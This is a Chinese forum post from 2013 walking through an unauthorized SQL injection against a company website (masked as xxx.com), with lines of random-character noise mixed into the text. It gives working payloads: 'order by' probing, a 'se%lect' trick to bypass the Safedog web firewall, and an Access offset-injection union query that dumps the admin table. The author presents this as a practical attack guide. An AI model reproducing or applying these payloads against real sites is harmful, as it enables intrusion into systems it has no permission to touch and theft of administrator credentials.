打开网站,一个企业站。
) G1 o$ \. i( a, E* u }6 |( ^; E. e: W7 d0 o+ ^
7 q4 S& q V+ U2 ~( L顺手加个admin y0 n$ X V0 z. `& V; M
& P0 Z; g: \0 S# ~0 e4 L
4 j |' G$ T3 W+ u
默认后台。& f$ {& K! e# V9 d: x
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。4 X- z5 B4 t" w; X4 H' @3 {$ [
( o' _' o# h8 J: j' T
6 O, z( E. I7 L# z/ p! D
6 J0 C- @5 v7 T4 r" V% T所以就不用御剑扫了,待会直接封IP。
% I1 N* l/ |8 o9 G . D: h( ^2 q3 ]
用order by语句判断是否存在注入。
- Y k; K8 s% F. ?4 F8 ~http://www.xxx.com /product_show.asp?id=997 order by 1' ~1 W$ R1 s1 H" ~. M1 I" o# J
http://www.xxx.com /product_show.asp?id=997 order by 1007 @5 N$ G0 e/ z' G/ O
现在存在注入,经测试后发现是9个字段。0 P- U2 O6 [( w/ E& | m- `
3 b9 `2 h% g% `1 L7 r9 N& ?/ T接下来进行联合查询,猜是否存在admin表。+ b7 M! Y$ d) }" s$ L' C( f
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
; g1 I, z7 Y- E5 i0 J
. Q$ k" E/ F( Q, \( G1 C5 y, y0 U: ?1 ^, m# h% n
* F3 @; ~1 k" i7 t3 r: I9 h% Y1 N; }) B4 S在select中间加个%,se%lect绕过安全狗。
! c8 \0 r; ^ z. l; t
! R2 Z( G( O% R3 N6 P9 k- P9 ?0 C: D8 b& y, B
发现存在admin表,然后开始手工猜常用的字段。+ K: e" n' @ `' K6 c1 c( b
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
8 n; }7 B4 a, q7 h: v ( H, N, M9 @% q- W9 x
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。7 ?6 X! Y* f j0 X9 P
7 j0 j3 {( M7 l7 L0 d
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。/ t Y9 E N+ e3 J9 Y. \$ q" z
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
/ C& f( v2 M' | u! r1 I8 i好了,敏感内容出显了。
3 ^; N* Y9 }+ o( L @- _7 k$ r0 ?* G0 T1 B8 | [1 w
0 _7 A" _9 G% n# e! i8 z
9 f' h8 m) v, v& N; d9 t |
发表于 2013-3-8 21:49:45
收藏
支持
反对